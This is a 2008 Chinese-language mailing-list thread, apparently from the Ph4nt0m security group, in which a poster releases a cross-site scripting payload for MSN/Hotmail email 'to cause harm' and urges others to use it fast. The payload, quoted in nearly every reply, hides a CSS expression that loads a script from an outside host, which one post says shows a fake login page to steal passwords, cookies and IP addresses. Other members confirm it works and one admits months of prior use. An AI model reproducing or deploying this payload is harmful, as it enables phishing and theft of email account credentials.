The group you are posting to is a Usenet group. Messages posted to this group will make your email address visible to anyone on the Internet. Your reply message has not been sent.
Your post will appear after it is approved by moderators
 |
From: monkeycz <monke...@gmail.com>Date: Sat, 2 Aug 2008 07:47:58 +0800
Local: Fri, Aug 1 2008 7:47 pm
Subject: msn最新跨站代码
如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
[
msn.txt < 1K ]
<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascrip t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t ap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC _tap.title+'script src=http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: ayaREI <xuew...@gmail.com>Date: Sun, 3 Aug 2008 11:59:47 +0800
Local: Sat, Aug 2 2008 11:59 pm
Subject: Re: [Ph4nt0m] msn最新跨站代码
若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
在08-8-2,monkeycz <monke...@gmail.com> 写道:
> 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> id="ly" style="display:none">function ok(){return
> true};window.onerror=ok</div><div id="tip" title="<a
> style="display:none">" style="display:none"></div><div id="tap"
> title="<" style="display:none"></div><div id="tep" title=">"
> style="display:none"></div><style>div{background-image:expression(javascrip t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t ap.title+'script
> id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC _tap.title+'script
> src=
> http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);
> }</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: Soloaway <Soloa...@gmail.com>Date: Sun, 3 Aug 2008 07:37:16 -0700 (PDT)
Local: Sun, Aug 3 2008 10:37 am
Subject: Re: msn最新跨站代码
1.根本就不是漏洞了就不应该拿出来忽悠人
2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
On Aug 3, 11:59 am, ayaREI <xuew...@gmail.com> wrote:
> 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> > id="ly" style="display:none">function ok(){return
> > true};window.onerror=ok</div><div id="tip" title="<a
> > style="display:none">" style="display:none"></div><div id="tap"
> > title="<" style="display:none"></div><div id="tep" title=">"
> > style="display:none"></div><style>div{background-image:expression(javascrip t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t ap.title+'script
> > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC _tap.title+'script
> > src=
> > http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);
> > }</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: coolman <monke...@gmail.com>Date: Sun, 3 Aug 2008 08:41:58 -0700 (PDT)
Local: Sun, Aug 3 2008 11:41 am
Subject: Re: msn最新跨站代码
不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
至于跨站里那个index.asp就是伪造的假登录页面
我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
ayaREI通过吧,算是技术讨论
说起来,什么时候有的需要审核的规矩,奥运搞得?
On 8月3日, 下午10时37分, <Soloa...@gmail.com> wrote:
> 1.根本就不是漏洞了就不应该拿出来忽悠人
> 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
> On Aug 3, 11:59 am, ayaREI <xuSoloawayew...@gmail.com> wrote:
> > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> > 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > > <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> > > id="ly" style="display:none">function ok(){return
> > > true};window.onerror=ok</div><div id="tip" title="<a
> > > style="display:none">" style="display:none"></div><div id="tap"
> > > title="<" style="display:none"></div><div id="tep" title=">"
> > > style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script
> > > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script
> > > src=
> > > http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);
> > > }</style></font>- 隐藏被引用文字 -
> - 显示引用的文字 -
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: ayaREI <xuew...@gmail.com>Date: Sun, 3 Aug 2008 23:55:24 +0800
Local: Sun, Aug 3 2008 11:55 am
Subject: Re: [Ph4nt0m] Re: msn最新跨站代码
审核是刺弄得,觉得邮件列表里闲谈太多的原因,和奥运没什么关系。
另外这就是外面传的yahoo和msn一套的那个吧,可惜我是不懂脚本的....所以审核中也不大理解你们的讨论。
在08-8-3,coolman <monke...@gmail.com> 写道:
> 不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
> 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
> 至于跨站里那个index.asp就是伪造的假登录页面
> 我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
> ayaREI通过吧,算是技术讨论
> 说起来,什么时候有的需要审核的规矩,奥运搞得?
> On 8月3日, 下午10时37分, <Soloa...@gmail.com> wrote:
> > 1.根本就不是漏洞了就不应该拿出来忽悠人
> > 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
> > On Aug 3, 11:59 am, ayaREI <xuSoloawayew...@gmail.com> wrote:
> > > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> > > 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > > > <font color="ffffff"> <div id="jmp"
> style="display:none">nop</div><div
> > > > id="ly" style="display:none">function ok(){return
> > > > true};window.onerror=ok</div><div id="tip" title="<a
> > > > style="display:none">" style="display:none"></div><div
> id="tap"
> > > > title="<" style="display:none"></div><div id="tep" title=">"
> style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script
> id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script
> > > > src=
> http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1
> );
> > > > }</style></font>- 隐藏被引用文字 -
> > - 显示引用的文字 -
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: fl0x <fl0xmail...@gmail.com>Date: Sun, 3 Aug 2008 16:46:32 -0700 (PDT)
Local: Sun, Aug 3 2008 7:46 pm
Subject: Re: msn最新跨站代码
并且,有了伪造页面之外,还需要有个数据库配合使用,对吧?
On 8月3日, 下午11时41分, coolman <monke...@gmail.com> wrote:
> 不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
> 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
> 至于跨站里那个index.asp就是伪造的假登录页面
> 我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
> ayaREI通过吧,算是技术讨论
> 说起来,什么时候有的需要审核的规矩,奥运搞得?
> On 8月3日, 下午10时37分, <Soloa...@gmail.com> wrote:
> > 1.根本就不是漏洞了就不应该拿出来忽悠人
> > 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
> > On Aug 3, 11:59 am, ayaREI <xuSoloawayew...@gmail.com> wrote:
> > > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> > > 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > > > <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> > > > id="ly" style="display:none">function ok(){return
> > > > true};window.onerror=ok</div><div id="tip" title="<a
> > > > style="display:none">" style="display:none"></div><div id="tap"
> > > > title="<" style="display:none"></div><div id="tep" title=">"
> > > > style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script
> > > > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script
> > > > src=
> > > > http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);
> > > > }</style></font>- 隐藏被引用文字 -
> > - 显示引用的文字 -
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: fl0x <fl0xmail...@gmail.com>Date: Sun, 3 Aug 2008 16:44:55 -0700 (PDT)
Local: Sun, Aug 3 2008 7:44 pm
Subject: Re: msn最新跨站代码
原来是在color属性里加入这么多XSS代码,里面的主旋律符号一个都不被过滤了?
On 8月3日, 下午11时55分, ayaREI <xuew...@gmail.com> wrote:
> 审核是刺弄得,觉得邮件列表里闲谈太多的原因,和奥运没什么关系。
> 另外这就是外面传的yahoo和msn一套的那个吧,可惜我是不懂脚本的....所以审核中也不大理解你们的讨论。
> 在08-8-3,coolman <monke...@gmail.com> 写道:
> > 不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
> > 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
> > 至于跨站里那个index.asp就是伪造的假登录页面
> > 我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
> > ayaREI通过吧,算是技术讨论
> > 说起来,什么时候有的需要审核的规矩,奥运搞得?
> > On 8月3日, 下午10时37分, <Soloa...@gmail.com> wrote:
> > > 1.根本就不是漏洞了就不应该拿出来忽悠人
> > > 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
> > > On Aug 3, 11:59 am, ayaREI <xuSoloawayew...@gmail.com> wrote:
> > > > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> > > > 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > > > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > > > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > > > > <font color="ffffff"> <div id="jmp"
> > style="display:none">nop</div><div
> > > > > id="ly" style="display:none">function ok(){return
> > > > > true};window.onerror=ok</div><div id="tip" title="<a
> > > > > style="display:none">" style="display:none"></div><div
> > id="tap"
> > > > > title="<" style="display:none"></div><div id="tep" title=">"
> > style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script
> > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script
> > > > > src=
> > http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1
> > );
> > > > > }</style></font>- 隐藏被引用文字 -
> > > - 显示引用的文字 -
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: tr4c3 <netxfo...@gmail.com>Date: Sun, 3 Aug 2008 12:45:07 -0700 (PDT)
Local: Sun, Aug 3 2008 3:45 pm
Subject: Re: msn最新跨站代码
顶,希望某些人在批评前先保证自我验证是在正确的操作下进行的。
我测试的结果是完全可用的。
On 8月3日, 下午11时41分, coolman <monke...@gmail.com> wrote:
> 不知道你那里来的牛人,我一看你的回答还真以为我发了个垃圾东西,还特地跑去测试了下,可以正常使用
> 此跨站可以在目标客户看邮件的时候打开一个伪造的msn登录页面,要求客户重新输入密码,获取密码,cookies,来源ip,等信息
> 至于跨站里那个index.asp就是伪造的假登录页面
> 我猜你就不会使用,如何发html格式的邮件都不会,是你水平不够,不要乱咬人
> ayaREI通过吧,算是技术讨论
> 说起来,什么时候有的需要审核的规矩,奥运搞得?
> On 8月3日, 下午10时37分, <Soloa...@gmail.com> wrote:
> > 1.根本就不是漏洞了就不应该拿出来忽悠人
> > 2.自己当作0day发出来之前不测试,既然有人测试或者知道行不通,至少应该让其他浏览网站的人知道省的误人子弟
> > On Aug 3, 11:59 am, ayaREI <xuSoloawayew...@gmail.com> wrote:
> > > 若此帖再无技术性回复,将不再通过回复...请大家不要牵扯到多余话题。
> > > 在08-8-2,monkeycz <monke...@gmail.com> 写道:
> > > > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > > > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > > > <font color="ffffff"> <div id="jmp" style="display:none">nop</div><div
> > > > id="ly" style="display:none">function ok(){return
> > > > true};window.onerror=ok</div><div id="tip" title="<a
> > > > style="display:none">" style="display:none"></div><div id="tap"
> > > > title="<" style="display:none"></div><div id="tep" title=">"
> > > > style="display:none"></div><style>div{background-image:expression(javascrip --t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC _-t-ap.title+'script
> > > > id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC --_tap.title+'script
> > > > src=
> > > > http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);
> > > > }</style></font>- 隐藏被引用文字 -
> > - 显示引用的文字 -- 隐藏被引用文字 -
> - 显示引用的文字 -
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: work <workhar...@gmail.com>Date: Mon, 4 Aug 2008 17:43:28 -0700 (PDT)
Local: Mon, Aug 4 2008 8:43 pm
Subject: Re: msn最新跨站代码
为什么我测试,这段代码
background-image:expression(javascrip-t:1?document.write(EC_tip.title
+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t-ap.title+'script
id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/
script'+EC_tep.title+EC-_tap.title+'script src= http://xxx.com/test/
index.asp?uid=some ...@hotmail.com'+EC_tep.title+EC_tap.title+'/
script'+EC_tep.title):1=1
在收到的邮件里已经被整体过滤掉了?希望高手帮忙哦~
On Aug 2, 7:47 am, monkeycz <monke...@gmail.com> wrote:
> 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> [msn.txt]<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script src=http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: iCrAckMe <icrac...@gmail.com>Date: Thu, 7 Aug 2008 03:01:40 -0700 (PDT)
Local: Thurs, Aug 7 2008 6:01 am
Subject: Re: msn最新跨站代码
郁闷,这个漏洞用了几个月,还是被人公布了。。无语。。。你知道有多少XXXXX因此受影响吗?又有多少人士要继续通宵挖掘.....
On Aug 2, 7:47 am, monkeycz <monke...@gmail.com> wrote:
> 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> [msn.txt]<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascrip t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t ap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC _tap.title+'script src=http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
Date: Thu, 7 Aug 2008 17:36:11 +0800 (CST)
Local: Thurs, Aug 7 2008 5:36 am
Subject: Re:[Ph4nt0m] Re: msn最新跨站代码
真是服了你们。。。这个漏洞用了好几个月,最后还是被某些人公布了,今天被封了,这些大家都game over了吧!....
-----原始邮件-----
发件人:work
发送时间:2008/08/05 08:43:28
收件人:Ph4nt0m
抄送:
主题:[Ph4nt0m] Re: msn最新跨站代码
为什么我测试,这段代码
background-image:expression(javascrip-t:1?document.write(EC_tip.title
+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t-ap.title+'script
id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/
script'+EC_tep.title+EC-_tap.title+'script src=http://xxx.com/test/
index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/
script'+EC_tep.title):1=1
在收到的邮件里已经被整体过滤掉了?希望高手帮忙哦~
On Aug 2, 7:47 am, monkeycz <monke...@gmail.com> wrote:
> 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
>
> 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
>
> [msn.txt]<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascrip-t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t-ap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC-_tap.title+'script src=http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: "xgc kxlzx" <voidloa...@gmail.com>Date: Fri, 8 Aug 2008 11:11:12 +0800
Local: Thurs, Aug 7 2008 11:11 pm
Subject: Re: [Ph4nt0m] Re: msn最新跨站代码
漏洞已补。。。。。
2008/8/7 <msnsh...@21cn.com>
> 真是服了你们。。。这个漏洞用了好几个月,最后还是被某些人公布了,今天被封了,这些大家都game over了吧!.... > ------------------------------
> -----原始邮件-----
> 发件人:work
> 发送时间:2008/08/05 08:43:28
> 收件人:Ph4nt0m
> 抄送:
> 主题:[Ph4nt0m] Re: msn最新跨站代码
> 为什么我测试,这段代码
> background-image:expression(javascrip-t:1?document.write(EC_tip.title
> +';top:'+EC_tap.title+'/a'+EC_tep.title+EC_t-ap.title+'script
> id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/
> script'+EC_tep.title+EC-_tap.title+'script src=http://xxx.com/test/
> index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/
> script'+EC_tep.title):1=1
> 在收到的邮件里已经被整体过滤掉了?希望高手帮忙哦~
> On Aug 2, 7:47 am, monkeycz <monke...@gmail.com> wrote:
> > 如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧
> > 有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!
> > [msn.txt]<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascrip -t:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_ t-ap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC -_tap.title+'script src=
> http://xxx.com/test/index.asp?uid=some...@hotmail.com'+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}</style></font>
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
From: kxlzx <voidloa...@gmail.com>Date: Fri, 8 Aug 2008 02:22:16 -0700 (PDT)
Local: Fri, Aug 8 2008 5:22 am
Subject: Re: msn最新跨站代码
完全可用。。。作者发出来后玩了几天才被封了。。。
某些人不知道情况就不要乱批评。。。
You must Sign in before you can post messages. You do not have the permission required to post.
|
|
|
|
